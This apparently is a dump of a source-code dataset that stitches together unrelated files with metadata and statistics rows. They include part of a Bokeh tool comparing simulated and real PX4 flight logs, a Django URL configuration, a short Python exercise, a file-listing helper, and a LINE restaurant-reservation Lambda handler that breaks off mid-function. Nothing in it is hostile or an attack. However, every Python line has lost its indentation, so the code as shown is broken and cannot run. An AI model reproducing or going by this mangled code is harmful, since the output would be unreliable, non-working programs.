config[1] = realname
config[2] = sim_metric
config[3] = real_metric
config[4] = simdescription
config[5] = realdescription
config[6] = 0
config[7] = 0
return config
def save_settings(config):
with open('settings', 'wb') as fp: #save state
pickle.dump(config, fp)
def read_settings():
''' We're now going to load a bunch of state variables to sync the app back to the last known state. The file "settings" should exist in the main directory
# config = [simname, realname, sim_metric, real_metric, simdescription, realdescription]
The format of the list is as follows:
config[0] = sim ID
config[1] = real ID
config[2] = sim_metric
config[3] = real_metric
config[4] = simdescription
config[5] = realdesciption
config[6] = real_reverse_button.active
config[7] = sim_reverse_button.active
'''
global simname, realname, sim_metric, real_metric, simdescription, realdescription, real_reverse_button, sim_reverse_button
if path.exists('settings'):
with open ('settings', 'rb') as fp:
config = pickle.load(fp)
simname = config[0]
realname = config[1]
sim_metric = config[2]
real_metric = config[3]
simdescription = str(config[4])
realdescription = str(config[5])
# real_reverse_button.active = config[5]
# sim_reverse_button.active = config[6]
else: # the app is running for the first time, so start with dummy data
simname = "sim.ulg"
realname = "real.ulg"
sim_metric = 'x'
real_metric = 'x'
simdescription = "Dummy simulation data"
realdescription = "Dummy real data"
config = update_config()
print("Starting with dummy data", config)
return config
def get_mission_mode(flight_mode_changes):
# time_offset, null = flight_mode_changes[0] # zero base the time
m_start = 0
m_end = 0
for i in range(len(flight_mode_changes)-1):
t_start, mode = flight_mode_changes[i]
# t_start = t_start - time_offset
t_end, mode_next = flight_mode_changes[i + 1]
# t_end = t_end - time_offset
if mode in flight_modes_table:
mode_name, color = flight_modes_table[mode]
if mode_name == 'Mission':
m_start = int(t_start)
m_end = int(t_end)
return m_start, m_end
def plot_flight_modes(flight_mode_changes,type):
global annotations, mission_annotations, annotation_counter, mission_annotation_counter, sim_label, real_label, labels, ts1
if mission_only:
for i in range(annotation_counter):
annotations[i].visible = False # turn off the previous annotations
for j in range(len(labels)): # Turn off the previous labels
labels[j].visible = False
if type == 'sim':
real_label.visible = True # now just turn on the two mission mode labels
else:
sim_label.visible = True
labels_y_pos = []
labels_x_pos = []
labels_text = []
labels_color = []
added_box_annotation_args = {}
if type == 'sim':
labels_y_offset = tplot_height - 300 # plot the sim shaded areas below the real ones
else:
labels_y_offset = tplot_height - 200
time_offset, null = flight_mode_changes[0] # zero base the time
for i in range(len(flight_mode_changes)-1):
t_start, mode = flight_mode_changes[i]
t_start = t_start - time_offset
t_end, mode_next = flight_mode_changes[i + 1]
t_end = t_end - time_offset
if mode in flight_modes_table:
mode_name, color = flight_modes_table[mode]
if mission_only:
if mode_name == 'Mission':
mtime_offset = t_start
mt_start = 0 # zero base mission mode
mt_end = t_end - mtime_offset
annotation = BoxAnnotation(left=int(mt_start), right=int(mt_end), top = labels_y_offset, bottom = labels_y_offset-100,
fill_alpha=0.09, line_color='black', top_units = 'screen',bottom_units = 'screen',
fill_color=color, **added_box_annotation_args)
annotation.visible = True
mission_annotations.append(annotation) # add the box to the list of annotations, so we can remove it if necessary later
mission_annotation_counter = mission_annotation_counter + 1 # increment the list of annotations
ts1.add_layout(annotation)
else:
annotation = BoxAnnotation(left=int(t_start), right=int(t_end), top = labels_y_offset, bottom = labels_y_offset-100,
fill_alpha=0.09, line_color='black', top_units = 'screen',bottom_units = 'screen',
fill_color=color, **added_box_annotation_args)
annotation.visible = True
annotations.append(annotation) # add the box to the list of annotations, so we can remove it if necessary later
annotation_counter = annotation_counter + 1 # increment the list of annotations
ts1.add_layout(annotation)
if flight_mode_changes[i+1][0] - t_start > 1e6: # filter fast
# switches to avoid overlap
if type == 'sim':
labels_text.append(mode_name)
else:
labels_text.append(mode_name)
labels_x_pos.append(t_start)
labels_y_pos.append(labels_y_offset)
labels_color.append(color)
# plot flight mode names as labels
if len(labels_text) > 0:
source = ColumnDataSource(data=dict(x=labels_x_pos, text=labels_text,
y=labels_y_pos, textcolor=labels_color))
if type == 'sim':
label_color = 'orange'
else:
label_color = 'blue'
if mission_only:
if mode_name == 'Mission':
label = Label(x=t_start, y=labels_y_offset, text='Mission', # just create a single label for each mission mode
y_units='screen', level='underlay',
render_mode='canvas',
text_font_size='10pt',
text_color= label_color, text_alpha=0.85,
background_fill_color='white',
background_fill_alpha=0.8, angle=90, angle_units = 'deg', text_align='right', text_baseline='top')
if type == 'sim':
sim_label = label
else:
real_label = label
ts1.add_layout(label)
else:
label = LabelSet(x='x', y='y', text='text', # create a whole label set
y_units='screen', level='underlay',
source=source, render_mode='canvas',
text_font_size='10pt',
text_color= label_color, text_alpha=0.85,
background_fill_color='white',
background_fill_alpha=0.8, angle=90/180*np.pi,
text_align='right', text_baseline='top')
labels.append(label)
ts1.add_layout(label)
def update(selected=None):
global reverse_sim_data, reverse_real_data, datalog, original_data, datasource, ts1, get_new_data
clear_boxes() #turn off old mode displays
if get_new_data:
print("Fetching new data", simname, realname, sim_metric, real_metric, read_file)
original_data = get_data(simname, realname, sim_metric, real_metric, read_file)
datalog = copy.deepcopy(original_data)
get_new_data = False
if reverse_sim_data:
datalog[['sim']] = sim_polarity * original_data['sim'] # reverse data if necessary
reverse_sim_data = False
if reverse_real_data:
datalog['real'] = real_polarity * original_data['real']
reverse_real_data = False
# range = datalog[['real']].max(numeric_only = True) - datalog[['real']].min(numeric_only = True)
range = 1
if ts1.y_range.end != None:
range = ts1.y_range.end - ts1.y_range.start
trend = get_trend(datalog)
trend = trend * int(range/10) # expand the trend line to at least 5% of of the overall range
pd_trend = pd.DataFrame(trend, columns = ['trend'])
datalog = pd.concat([datalog, pd_trend], axis=1)
position = get_displacement(datalog)
position = position/5 # scaled
pd_position = pd.DataFrame(position, columns = ['position'])
datalog = pd.concat([datalog, pd_position], axis=1)
datasource.data = datalog
plot_flight_modes(sim_flight_mode_changes, 'sim')
plot_flight_modes(real_flight_mode_changes, 'real')
config = update_config()
stats.text, stats2.text = get_stats(datalog)
save_settings(config)
def prep_for_stats(datalog):
sim = datalog[['sim']].to_numpy()
real = datalog[['real']].to_numpy()
sim = sim[~np.isnan(sim)] # eliminate any NaNs
real = real[~np.isnan(real)]
min_size = min(sim.size, real.size) # shrink the longer one so it's the same size as the smaller one
real = real[:min_size]
sim = sim[:min_size]
return real, sim
def get_displacement(datalog):
real, sim = prep_for_stats(datalog)
return sim - real
def get_trend(datalog):
real, sim = prep_for_stats(datalog)
sim_trend = simstats.rate_of_change(sim)
real_trend = simstats.rate_of_change(real)
trend_diff = sim_trend - real_trend
return trend_diff
def get_stats(datalog):
thiel = simstats.sim2real_stats(datalog)
song = simstats.sim2real_stats2(datalog)
real, sim = prep_for_stats(datalog) # this just cleans up the data so it wil work with the stats libraries
trend = simstats.equation_8(real,sim) # find trend correlate
print("trend= ", trend)
position = simstats.position_metric(real, sim, 1) # find position correlate
print("position =", position)
thiel_text = 'Thiel coefficient (1 = no correlation, 0 = perfect): ' + str(thiel)
song_text = 'Song coefficient (0 = perfect): ' + str(song)
return thiel_text, song_text
def normalize():
global datalog, realnorm, simnorm, get_new_data, norm
if (normalize_mode_button.active == 1):
norm = True
realnorm = 0
simnorm = 0
sim_mean = datalog['sim'].mean() # get the average
real_mean = datalog['real'].mean()
if sim_mean >= real_mean:
realnorm = sim_mean - real_mean
datalog['real'] = datalog['real'] + realnorm # increase the lower one by the average of their difference
else:
simnorm = real_mean - sim_mean
datalog['sim'] = datalog['sim'] + simnorm
else:
norm = False
datalog['real'] = datalog['real'] - realnorm # revert to the way they were
datalog['sim'] = datalog['sim'] - simnorm
get_new_data = False
update()
def clear_boxes():
global annotations, mission_annotations
for i in range(mission_annotation_counter):
mission_annotations[i].visible = False # turn off the previous mission annotations
for j in range(annotation_counter):
annotations[j].visible = False # turn off the previous other mode annotations
def mission_mode():
global mission_only, get_new_data
if (mission_mode_button.active == 1):
mission_only = True
print("Show only missions")
else:
mission_only = False
print("Show all modes")
get_new_data = True
normalize_mode_button.active = 0
update()
def reverse_sim():
global sim_polarity, reverse_sim_data, config
if (sim_reverse_button.active == 1):
sim_polarity = -1
config[6] = sim_reverse_button.active
else: sim_polarity = 1
reverse_sim_data = True
normalize_mode_button.active = 0
update()
def reverse_real():
global real_polarity, reverse_real_data, config
if (real_reverse_button.active == 1):
real_polarity = -1
config[5] = real_reverse_button.active
else: real_polarity = 1
reverse_real_data = True
normalize_mode_button.active = 0
update()
def swap_sim():
global sim_metric, get_new_data
print("Swapping sim. Metric is", sim_metric)
if sim_metric == 'x':
sim_metric = 'y'
else:
sim_metric = 'x'
get_new_data = True
normalize_mode_button.active = 0
update()
def swap_real():
global real_metric, get_new_data
print("Swapping real. Metric is", real_metric)
if real_metric == 'x':
real_metric = 'y'
else:
real_metric = 'x'
get_new_data = True
normalize_mode_button.active = 0
update()
def sim_change(attrname, old, new):
global sim_metric, real_metric, read_file, config, get_new_data
print("Sim change:", new)
sim_metric = new
real_metric = new
config[2] = sim_metric # save state
config[3] = real_metric # save state
get_new_data = True
read_file = True
normalize_mode_button.active = 0
update()
def get_thiel_analysis_plots(simname, realname):
global datalog, original_data, datasource, layout, ts1, chart, annotation_counter
additional_links= "<b><a href='/browse?search=sim'>Load Simulation Log</a> <p> <a href='/browse?search=real'>Load Real Log</a></b>"
save_settings(config)
datalog = get_data(simname, realname, sim_metric, real_metric, read_file)
original_data = copy.deepcopy(datalog)
for i in range(10):
if keys[i][0] == 'x':
found_x = i
datatype = Select(value='x', options=keys[found_x])
datatype.on_change('value', sim_change)
intro_text = Div(text="""<H2>Sim/Real Thiel Coefficient Calculator</H2> \
<p> Load two PX4 datalogs, one a real flight and the other a simulation of that flight, \
and see how well they compare. We use the well-known <a href="https://www.vosesoftware.com/riskwiki/Thielinequalitycoefficient.php">Thiel Coefficient</a> and <a href="https://drive.google.com/file/d/1XY8aZz89emFt-LAuUZ2pjC1GHwRARr9f/view">Song variation</a> of that to generate correspondence scores. Our Jupyter Notebook that demonstrates and explains the Song methodology is <a href="https://github.com/zlite/PX4_flight_review/blob/master/thiel_app/clean_replication.ipynb">here</a>""",width=800, height=120, align="center")
choose_field_text = Paragraph(text="Choose a data field to compare:",width=500, height=15)
links_text = Div(text="<table width='100%'><tr><td><h3>" + "</h3></td><td align='left'>" + additional_links+"</td></tr></table>")
datasource = ColumnDataSource(data = dict(time=[],sim=[],real=[],trend=[],position=[]))
datasource.data = datalog
tools = 'xpan,wheel_zoom,reset'
ts1 = figure(plot_width=tplot_width, plot_height=tplot_height, tools=tools, x_axis_type='linear')
# ts1.add_layout(Legend(), 'right') # if you want the legend outside of the plot
print("real description", realdescription)
ts1.line('time','sim', source=datasource, line_width=3, color="orange", legend_label="Simulated data: "+ simdescription)
ts1.line('time','real', source=datasource, line_width=3, color="blue", legend_label="Real data: " + realdescription)
ts1.line('time','trend', source=datasource, line_width=1, color="green", legend_label="Difference in trend (scaled)")
ts1.line('time','position', source=datasource, line_width=1, color="red", line_dash = 'solid', legend_label="Difference in position (scaled)")
ts1.legend.background_fill_alpha = 0.7 # make the background of the legend more transparent
ts1.add_layout(Title(text="Time (seconds)", align="center"), "below")
# annotation_counter = annotation_counter + 1 # increment the list of annotations
# x_range_offset = (datalog.last_timestamp - datalog.start_timestamp) * 0.05
# x_range = Range1d(datalog.start_timestamp - x_range_offset, datalog.last_timestamp + x_range_offset)
plot_flight_modes(sim_flight_mode_changes, 'sim')
plot_flight_modes(real_flight_mode_changes, 'real')
# set up layout
widgets = column(datatype,stats,stats2)
mission_button = column(mission_mode_button)
normalize_button = column(normalize_mode_button)
sim_button = column(sim_reverse_button)
real_button = column(real_reverse_button)
sswap_button = column(sim_swap_button)
rswap_button = column(real_swap_button)
rule = column(explainer)
space = column(spacer)
main_row = row(widgets)
chart = column(ts1)
buttons = column(mission_button, normalize_button, space, sim_button, sswap_button, rule, real_button, rswap_button)
layout = column(main_row, chart, buttons)
# initialize
update()
curdoc().add_root(intro_text)
curdoc().add_root(links_text)
curdoc().add_root(choose_field_text)
curdoc().add_root(layout)
curdoc().title = "Flight data"
print("Now starting Thiel app")
GET_arguments = curdoc().session_context.request.arguments
config = read_settings()
print("simname is", simname, "realname is", realname)
if GET_arguments is not None and 'log' in GET_arguments:
log_args = GET_arguments['log']
if len(log_args) == 1:
templog_id = str(log_args[0], 'utf-8')
file_details = templog_id.split('desc:')
templog_id = file_details[0]
if (templog_id.find("sim") != -1):
log_id = templog_id.replace('sim','')
print("This is a sim file. New log ID=", log_id)
ulog_file_name = get_log_filename(log_id)
simname = os.path.join(get_log_filepath(), ulog_file_name)
simdescription = str(file_details[1])
elif (templog_id.find("real") != -1):
log_id = templog_id.replace('real','')
print("This is a real file. New log ID=", log_id)
ulog_file_name = get_log_filename(log_id)
realname = os.path.join(get_log_filepath(), ulog_file_name)
realdescription = str(file_details[1])
else:
if not validate_log_id(templog_id):
raise ValueError('Invalid log id: {}'.format(log_id))
print('GET[log]={}'.format(templog_id))
ulog_file_name = get_log_filename(templog_id)
get_thiel_analysis_plots(simname, realname) | 41.426848 | 538 | 0.6547 | 3,694 | 27,466 | 4.634001 | 0.154304 | 0.014605 | 0.023835 | 0.00888 | 0.358745 | 0.29209 | 0.231452 | 0.212057 | 0.186646 | 0.160007 | 0 | 0.011825 | 0.245686 | 27,466 | 663 | 539 | 41.426848 | 0.814413 | 0.137625 | 0 | 0.258189 | 0 | 0.007707 | 0.104175 | 0.00549 | 0.001927 | 0 | 0 | 0 | 0 | 1 | 0.040462 | false | 0.001927 | 0.061657 | 0 | 0.119461 | 0.030829 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5c7806917d8c3147196ffa048e504ff3cd7f109 | 952 | py | Python | leads/urls.py | imchandr/django-crm | 67df86fa954101eabefdaa51cd4f718e9bb86be2 | [
"MIT",
"Unlicense"
] | null | null | null | leads/urls.py | imchandr/django-crm | 67df86fa954101eabefdaa51cd4f718e9bb86be2 | [
"MIT",
"Unlicense"
] | 1 | 2021-11-20T17:50:36.000Z | 2021-11-20T17:51:05.000Z | leads/urls.py | imchandr/django-crm | 67df86fa954101eabefdaa51cd4f718e9bb86be2 | [
"MIT",
"Unlicense"
] | null | null | null | from django.urls import path
from .views import (
lead_create, lead_list, lead_details, lead_create,lead_update,lead_delete,
LeadListView,
LeadDetailsView, LeadCreateView,
LeadUpdateView,LeadDeleteView,
AssignAgentView,
CategoryListView,
# CategoryDetailView
)
app_name = "leads"
urlpatterns = [
path('',LeadListView.as_view(), name='lead-list'),
path('create/', LeadCreateView.as_view(), name='lead-create'),
path('<int:pk>',LeadDetailsView.as_view(), name='lead-details'),
path('<int:pk>/assign-agent/',AssignAgentView.as_view(), name='assign-agent'),
path('<int:pk>/update/',LeadUpdateView.as_view(), name='lead-update'),
path('<int:pk>/delete/', LeadDeleteView.as_view(), name='lead-delete'),
path('categories/', CategoryListView.as_view(), name='category-list'),
#path('categories/<int:pk>/', CategoryDetailView.as_view(), name='category-detail'),
]
| 31.733333 | 88 | 0.676471 | 105 | 952 | 5.990476 | 0.314286 | 0.076312 | 0.127186 | 0.111288 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152311 | 952 | 29 | 89 | 32.827586 | 0.77943 | 0.106092 | 0 | 0 | 0 | 0 | 0.193396 | 0.025943 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.105263 | 0 | 0.105263 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5ca9a9099f02b0a997c7320aa921922873e7a7d | 282 | py | Python | exercise4-4.py | raygomez/python-exercise-4 | 5f4fdb23767f1cc04dc133497b866dfa9feeb7f9 | [
"MIT"
] | null | null | null | exercise4-4.py | raygomez/python-exercise-4 | 5f4fdb23767f1cc04dc133497b866dfa9feeb7f9 | [
"MIT"
] | null | null | null | exercise4-4.py | raygomez/python-exercise-4 | 5f4fdb23767f1cc04dc133497b866dfa9feeb7f9 | [
"MIT"
] | null | null | null | from __future__ import print_function
__author__ = 'ragomez'
def f(data):
mylist = xrange(0, data)
for i in mylist:
if ((i % 5) == 0) and ((i % 7) == 0):
yield i
number = int(raw_input('Enter a number:'))
for num in f(number):
print(num, end=',') | 20.142857 | 45 | 0.570922 | 43 | 282 | 3.511628 | 0.674419 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02439 | 0.27305 | 282 | 14 | 46 | 20.142857 | 0.712195 | 0 | 0 | 0 | 0 | 0 | 0.081272 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.1 | 0 | 0.2 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5cace1f3781638ae4c1f8b7b3c9dd3d8c717941 | 624 | py | Python | helpers/io_helper.py | muhlar/quant-reseach | b9f9a9cde94bf0ebb3d809240cc7542dfcbf7634 | [
"MIT"
] | 56 | 2019-06-14T18:05:28.000Z | 2022-01-24T15:32:40.000Z | helpers/io_helper.py | muhlar/quant-reseach | b9f9a9cde94bf0ebb3d809240cc7542dfcbf7634 | [
"MIT"
] | 1 | 2020-04-01T09:31:04.000Z | 2020-04-01T12:32:31.000Z | helpers/io_helper.py | muhlar/quant-reseach | b9f9a9cde94bf0ebb3d809240cc7542dfcbf7634 | [
"MIT"
] | 33 | 2019-06-19T13:27:31.000Z | 2022-01-25T23:57:17.000Z | import os
def check_path(path, create_if_not_exist=True):
if not os.path.exists(path) and create_if_not_exist == True:
os.makedirs(path)
return True
elif not os.path.exists(path) and create_if_not_exist == False:
return False
def list_files_in_path_os(path, filename_prefix="", filename_suffix="", recursive=True):
while path[-1] == "/":
path = path[:-1]
all_files = []
for (dirpath, dirnames, fname) in os.walk(path):
all_files.extend([dirpath + "/" + el for el in fname if filename_prefix in el and filename_suffix in el])
if recursive == False:
break
all_files = sorted(all_files)
return all_files | 32.842105 | 107 | 0.725962 | 102 | 624 | 4.215686 | 0.343137 | 0.093023 | 0.076744 | 0.111628 | 0.232558 | 0.176744 | 0.176744 | 0.176744 | 0.176744 | 0.176744 | 0 | 0.003781 | 0.152244 | 624 | 19 | 108 | 32.842105 | 0.809074 | 0 | 0 | 0 | 0 | 0 | 0.0032 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0.058824 | 0 | 0.352941 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5cc5404833e8916cb271ba99462a3cbdbb519ef | 12,977 | py | Python | backend/APP/reservation_put/reservation_put.py | cvc-Fujii/line-api-use-case-reservation-Restaurant | 248ae2ed52d8325d17d2ddbbd2975068381193fe | [
"Unlicense"
] | 8 | 2021-05-21T03:10:12.000Z | 2022-01-09T10:10:26.000Z | backend/APP/reservation_put/reservation_put.py | cvc-Fujii/line-api-use-case-reservation-Restaurant | 248ae2ed52d8325d17d2ddbbd2975068381193fe | [
"Unlicense"
] | null | null | null | backend/APP/reservation_put/reservation_put.py | cvc-Fujii/line-api-use-case-reservation-Restaurant | 248ae2ed52d8325d17d2ddbbd2975068381193fe | [
"Unlicense"
] | 4 | 2021-05-28T09:57:52.000Z | 2021-09-27T12:25:54.000Z | import logging
import json
import os
import datetime
import flex_message_builder
from common import (common_const, line, utils)
from validation.restaurant_param_check import RestaurantParamCheck
# DynamoDB操作クラスのインポート
from common.channel_access_token import ChannelAccessToken
from common.remind_message import RemindMessage
from restaurant.restaurant_reservation_info import RestaurantReservationInfo
from restaurant.restaurant_shop_reservation import RestaurantShopReservation
from restaurant.restaurant_shop_master import RestaurantShopMaster
# 環境変数
REMIND_DATE_DIFFERENCE = int(os.getenv('REMIND_DATE_DIFFERENCE'))
CHANNEL_ID = os.getenv('OA_CHANNEL_ID')
LIFF_CHANNEL_ID = os.getenv('LIFF_CHANNEL_ID')
# ログ出力の設定
LOGGER_LEVEL = os.environ.get("LOGGER_LEVEL")
logger = logging.getLogger()
if LOGGER_LEVEL == 'DEBUG':
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
# 定数の宣言
THIRTY_MINUTES = datetime.timedelta(minutes=30)
ONE_WEEK = datetime.timedelta(days=7)
JST_UTC_TIMEDELTA = datetime.timedelta(hours=9)
VACANCY_FLG_MAP = {'AVAILABLE_NOTHING': 0,
'AVAILABLE_MUCH': 1, 'AVAILABLE_FEW': 2}
RESERVED_PROPORTION_MAP = {'RESERVED_MUCH': 0.8, 'RESERVED_FULL': 1}
ON_DAY_REMIND_DATE_DIFFERENCE = 0
# テーブル操作クラスの初期化
shop_master_table_controller = RestaurantShopMaster()
reservation_info_table_controller = RestaurantReservationInfo()
shop_reservation_table_controller = RestaurantShopReservation()
channel_access_token_table_controller = ChannelAccessToken()
message_table_controller = RemindMessage()
def put_customer_reservation_info(body, shop_info):
"""
顧客予約情報テーブルに予約情報の登録を行う。
Parameters
----------
body : dict
ユーザーが選択した予約情報
shop_info: dict
予約する店舗の情報
Returns
-------
reservation_id: str
予約情報を一意に判別するID
"""
customer_reservation_item = {
"shop_id": body['shopId'],
"shop_name": body['shopName'],
"user_id": body['userId'],
"user_name": body['userName'],
"course_id": body['courseId'],
"course_name": body['courseName'],
"reservation_people_number": body['reservationPeopleNumber'],
"reservation_date": body['reservationDate'],
"reservation_starttime": body['reservationStarttime'],
"reservation_endtime": body['reservationEndtime'],
"amount": get_course_price(shop_info, body['courseId']),
}
reservation_id = reservation_info_table_controller.put_item(
**customer_reservation_item)
return reservation_id
def get_course_price(shop_info, course_id):
"""
店舗情報のテーブルから、コースの値段を取得する。
Parameters
----------
shop_info: dict
shop_idを指定した取得した店舗の情報
course_id : int
予約するコースのID
Returns
-------
course_price: int
コースの値段
"""
course_price = [course_list['price']
for course_list in shop_info['course']
if course_list['courseId'] == course_id]
if not course_price:
return 0
return course_price[0]
def put_shop_reservation_info(body, shop_info):
"""
カレンダーに予約情報を登録する。
既に指定した月日に予約情報がある場合、Updateを行い、
予約情報がない場合、Insertを行う。
Parameters
----------
body : dict
ユーザーが選択した予約情報
shop_info: dict
shop_idを指定した取得した店舗の情報
"""
# shopIdと予約日でそのデータがあるか検索する
reservation_item = shop_reservation_table_controller.get_item(
body['shopId'], body['reservationDate'])
new_reservation_list, new_total_reserved_number = divide_thirty_minutes(
body['reservationStarttime'], body['reservationEndtime'],
body['reservationPeopleNumber']
)
# 店舗の1日の予約可能人数を算出する 計算:席数*営業時間の30分区切り
openTime = datetime.datetime.strptime(
shop_info['shop']['openTime'], "%H:%M")
closeTime = datetime.datetime.strptime(
shop_info['shop']['closeTime'], "%H:%M")
restaurant_open_term = int((closeTime - openTime) / THIRTY_MINUTES)
max_reservable_number = int(
shop_info['shop']['seatsNumber']) * restaurant_open_term
# if->指定した予約日に予約情報がある場合:更新
# else->指定した予約日に予約情報がない場合:新規作成
if reservation_item:
# 新規データと元データを統合するため、重複している時間の検索用に
# 予約開始時刻をkeyとして予約情報をvalueに持ったデータを作成する。
start_time_index = {}
for reserved_time_info in reservation_item['reservedInfo']:
start_time_index[reserved_time_info['reservedStartTime']
] = reserved_time_info
# if->予約がある時間帯:予約人数を足す
# else->予約が無い時間帯:その時間を新たに追加する
for new_reservation_info in new_reservation_list:
reservation_start_time = new_reservation_info['reservedStartTime']
if reservation_start_time in start_time_index:
start_time_index[reservation_start_time]['reservedNumber'] +=\
new_reservation_info['reservedNumber']
else:
start_time_index[reservation_start_time] = new_reservation_info
# 一日の予約合計数と席数に対する予約合計数の比率を算出する(カレンダーの空き状況出力時に使用)
sum_total_reserved_number = reservation_item['totalReservedNumber'] + \
new_total_reserved_number
reserved_proportion = sum_total_reserved_number / max_reservable_number
key = {
'shop_id': body['shopId'],
'reserved_day': body['reservationDate']
}
update_value = {
'reserved_info': list(start_time_index.values()),
'total_reserved_number': sum_total_reserved_number,
'vacancy_flg': get_vacancy_flg(reserved_proportion)
}
shop_reservation_table_controller.update_item(**key, **update_value)
else:
# 席数に対する予約合計数の比率を算出する(カレンダーの空き状況出力時に使用)
reserved_proportion = new_total_reserved_number / max_reservable_number
new_reservation_item = {
'shop_id': body['shopId'],
'reserved_day': body['reservationDate'],
'reserved_year_month': utils.format_date(body['reservationDate'],
'%Y-%m-%d', '%Y-%m'),
'reserved_info': new_reservation_list,
'total_reserved_number': new_total_reserved_number,
'vacancy_flg': get_vacancy_flg(reserved_proportion),
}
shop_reservation_table_controller.put_item(**new_reservation_item)
def divide_thirty_minutes(reservation_start_time, reservation_end_time,
reservation_people_number):
"""
数時間単位の予約情報を、30分単位の予約情報に分割し、listで返却する。
データ:予約開始時間,予約終了時間,予約人数
Parameters
----------
reservation_start_time : str
予約の希望開始時間
reservation_end_time : str
予約の希望終了時間
reservation_people_number : int
予約人数
Returns
-------
reservation_info_list: list
30分単位に分割された予約情報。
すべての時間帯で、予約人数は同じになる。
total_people_number: int
30分ごとの予約人数の合計
"""
start_time = datetime.datetime.strptime(
reservation_start_time, "%H:%M")
end_time = datetime.datetime.strptime(
reservation_end_time, "%H:%M")
thirty_minutes = datetime.timedelta(minutes=30)
# 時間のデータを30分毎の時間に分割してリストを作成する。
reservation_info_list = []
tmp_start_time = start_time
tmp_end_time = start_time + thirty_minutes
total_people_number = 0
while tmp_end_time <= end_time:
reservation_info = {
'reservedStartTime': tmp_start_time.strftime('%H:%M'),
'reservedEndTime': tmp_end_time.strftime('%H:%M'),
'reservedNumber': reservation_people_number
}
reservation_info_list.append(reservation_info)
total_people_number += reservation_people_number
tmp_start_time += thirty_minutes
tmp_end_time += thirty_minutes
return reservation_info_list, total_people_number
def get_vacancy_flg(reserved_proportion):
"""
予約割合から判断し、空き状況のフラグを取得する。
Parameters
----------
reserved_proportion : float
予約数/席数で計算した予約済み率
Returns
-------
vacancy_flg: int
空き状況フラグ
"""
if(reserved_proportion < RESERVED_PROPORTION_MAP['RESERVED_MUCH']):
vacancy_flg = VACANCY_FLG_MAP['AVAILABLE_MUCH']
elif(reserved_proportion >= RESERVED_PROPORTION_MAP['RESERVED_MUCH'] and
reserved_proportion < RESERVED_PROPORTION_MAP['RESERVED_FULL']):
vacancy_flg = VACANCY_FLG_MAP['AVAILABLE_FEW']
else:
vacancy_flg = VACANCY_FLG_MAP['AVAILABLE_NOTHING']
return vacancy_flg
def create_flex_message(body, remind_date_difference):
"""
LINEメッセージで送信するフレックスメッセージを作成する
Parameters
----------
body : dict
メッセージ送信にuser_id等の必要なデータ
remind_date_difference : int
リマインドを送信する日付と当日の差分
Returns
-------
flex_message : str
フレックスメッセージの形式に整形したjson型データ
"""
reservation_datetime = body['reservationDate'] + ' ' + \
body['reservationStarttime'] + '-' + body['reservationEndtime']
flex_prm = {'shop_name': body['shopName'],
'reservation_date': reservation_datetime,
'course_name': body['courseName'],
'number_of_people': str(body['reservationPeopleNumber']),
'remind_date_difference': remind_date_difference
}
flex_message = flex_message_builder.create_restaurant_remind(**flex_prm)
return flex_message
def get_channel_access_token(channel_id):
"""
短期チャネルアクセストークンをチャネル情報のテーブルから取得する
Parameters
----------
channel_id : str
LINE公式アカウントもしくはMINIアプリのチャネルID
LINE Developersコンソールにて確認可能
Returns
-------
channelAccessToken : str
access_token:短期のチャネルアクセストークン
"""
item = channel_access_token_table_controller.get_item(channel_id)
return item['channelAccessToken']
def put_push_messages_to_dynamo(body, remind_date_difference):
"""
プッシュメッセージのメッセージ情報を作成し、DynamoDBに登録する。
DynamoDBへの登録処理自体は共通処理にて行っている。
Parameters
----------
body : dict
フロントから渡ってきたパラメータ
remind_date_difference : int
当日以前のリマインド行う日付の差分
予約日以降のメッセージ送信を考慮し、マイナス値を許可(ex:3日前→-3)
"""
remind_date_on_day = body['reservationDate']
# 当日のリマインドメッセージを登録
flex_message_on_day = create_flex_message(body, ON_DAY_REMIND_DATE_DIFFERENCE) # noqa:E501
message_table_controller.put_push_message(
body['userId'], CHANNEL_ID, flex_message_on_day,
remind_date_on_day)
# 指定日のリマインドメッセージを登録
flex_message_day_before = create_flex_message(body, remind_date_difference) # noqa:E501
remind_date_day_before = utils.calculate_date_str_difference(
remind_date_on_day, remind_date_difference)
message_table_controller.put_push_message(
body['userId'], CHANNEL_ID, flex_message_day_before,
remind_date_day_before)
def lambda_handler(event, context):
"""
予約情報のデータ登録とLINEメッセージの送信を行う。
Parameters
----------
event : dict
フロントから送られたパラメータ等の情報
context : __main__.LambdaContext
Lambdaランタイムや関数名等のメタ情報
Returns
-------
response: dict
正常の場合、予約IDを返却する。
エラーの場合、エラーコードとエラーメッセージを返却する。
"""
# パラメータログ
logger.info(event)
if event['body'] is None:
error_msg_disp = common_const.const.MSG_ERROR_NOPARAM
return utils.create_error_response(error_msg_disp, 400)
body = json.loads(event['body'])
#ユーザーID取得
try:
user_profile = line.get_profile(
body['idToken'], LIFF_CHANNEL_ID)
